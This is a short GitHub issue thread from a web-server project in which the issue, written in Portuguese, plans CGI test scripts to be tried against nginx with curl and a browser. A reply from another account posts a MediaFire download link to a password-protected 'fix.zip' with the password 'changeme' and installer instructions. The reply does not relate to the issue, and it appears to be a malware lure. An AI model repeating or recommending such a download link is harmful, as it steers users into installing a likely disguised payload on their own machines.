### ISSUE TITLE
cgi-testing

### ISSUE THREAD

**Issue by angelasoler** [angelasoler/WebServ#95]
- Criar scripts cgi que explorem as possibilidades de uso do CGI.
- Testar em nginx com requesições curl e por browser
Resultado: Entendimento do que mais deve ser implementado em CGI

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
